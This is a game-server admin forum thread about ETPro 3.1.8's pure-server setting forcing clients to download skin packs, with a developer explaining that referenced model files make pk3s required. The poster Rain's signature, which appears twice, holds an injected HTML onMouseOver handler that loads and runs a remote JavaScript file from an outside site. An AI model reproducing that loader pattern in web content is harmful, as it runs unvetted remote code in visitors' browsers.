pure settings and skinpacks

Discussion for Admins of ETPro/BayonET servers.
If you don't run a server, please don't post here...

Moderators: Forum moderators, developers

booger

pure settings and skinpacks

Post by booger »

Ok, I know I've posted before about sv_pure settings---
I was running 3.1.0 with pure set to 1,and had skiins that some of the clans use on the server in etmain,and a custom soundpak This was working fine,regular players signing were not required to dload skins.
The problem arose after installing 3.1.8,now everyone is required to dload skins even though are no scripts inside those pk3,s.
The soundpak seems unaffected however to most players.
Allso would like command that shows files on the pure list,I had it but forgot

FuB@R

Post by FuB@R »

Hi ... i found the same problem, we have been running ET-enhancement pack with server set to pure 1 and it didnt require clients to download the extra skin packs, with 3.1.8 it wont let us .....is this by design now or accident?
booger

Post by booger »

Well I know I'm not alone.
uber-noob

Post by uber-noob »

The same happened for us, we had to remove our skinpack because 3.1.8 forced all clients to download it.
RoadKillPuppy

Post by RoadKillPuppy »

Then the pure server setting is now working the way it should work...
Mark

Post by Mark »

RoadKillPuppy wrote:Then the pure server setting is now working the way it should work...
I really hope it's a bug.

greets
Mark
Get owned at: Gaming@d1p.de (217.172.182.126:27960)
Hi! I'm a .signature *virus*! Copy me into your ~/.signature to help me spread!
ReyalP

Post by ReyalP »

RoadKillPuppy wrote:Then the pure server setting is now working the way it should work...
No, not really. The pure system is most likely working exactly the same way it always has.

What files the server requires you to download are based on what it thinks it is 'using'. Files that are present on the server, but not in use may exist on the client if they have the same checksum, but are not required to.

My guess is that something in the new etpro causes more files to be in use. This might be related by the b_realhead option, which needs stuff that was previously client only.

Note that the pure system itself is in the engine, and so has not been changed by etpro, unless they have done some more serious binary patch hackery.
send lawyers, guns and money
booger

Post by booger »

The way it's supposed to work? Give me a friggin break....
send lawyers, guns and money
Warren Zevon
No, not really. The pure system is most likely working exactly the same way it always has.
I've heard of schmoolzing but really
So I would like to know why things change?
gotenks

Post by gotenks »

more then likely it's because skins may[/]b affect how you see the enemy's head hence etpro says it's inuse and downloads it... sound packs shouldn't be affected by this type of thing though
My Website
After a night of binge drinking:
=FF=im2good4u wrote:WTF wanst i on top ?
Rain

Post by Rain »

booger wrote:So I would like to know why things change?
SCDS_reyalP wrote:What files the server requires you to download are based on what it thinks it is 'using'. Files that are present on the server, but not in use may exist on the client if they have the same checksum, but are not required to.

My guess is that something in the new etpro causes more files to be in use. This might be related by the b_realhead option, which needs stuff that was previously client only.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
uber-noob

Post by uber-noob »

That means it won't change. Ok, then this is the dead for skinpacks on our sever. I'm not comfortable with forcing the use of custom skins on our players.
booger

Post by booger »

Your guess? really...
Thats a polite way of saying 'we don't want to tell you'
etpro won't alter the way the pure system works...hmmm

No disrespect,for anyone involved,but there is a reason that I would like to know.
I know PB is a sorry pos,and the powers that be would like to take claim to the anti-cheat obligation,but cut the real people some slack will ya?
Last edited by booger on Sat Nov 20, 2004 8:33 pm, edited 2 times in total.
Rain

Post by Rain »

I would think that skinpacks would just contain textures, which shouldn't be referenced by the b_realhead code, though...
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
booger

Post by booger »

Rain wrote:I would think that skinpacks would just contain textures, which shouldn't be referenced by the b_realhead code, ?though...
Again,same thing why force dload in 318?
zinx

Post by zinx »

ET Pro doesn't purposely force it. the .mdx and .mdm are referenced now, though, and if the "skin" pack contains those, it will be referenced too. The way ET works (Not ET Pro, but the ET engine), is that any pk3 which gets referenced by the server is required on the clients; otherwise if the server has it, it's optional.

If the "skin" pack does contain .mdx/.mdm, those could affect the position of the head box, so it really is needed. If it doesn't, then b_realhead isn't what's causing the pk3 to be downloaded.

It may currently load the .mdx/.mdm even with b_realhead off; I will check in to that and make sure it's fixed before the final 3.2.0 release, if it's broken.
Zinx Verituse http://zinx.xmms.org/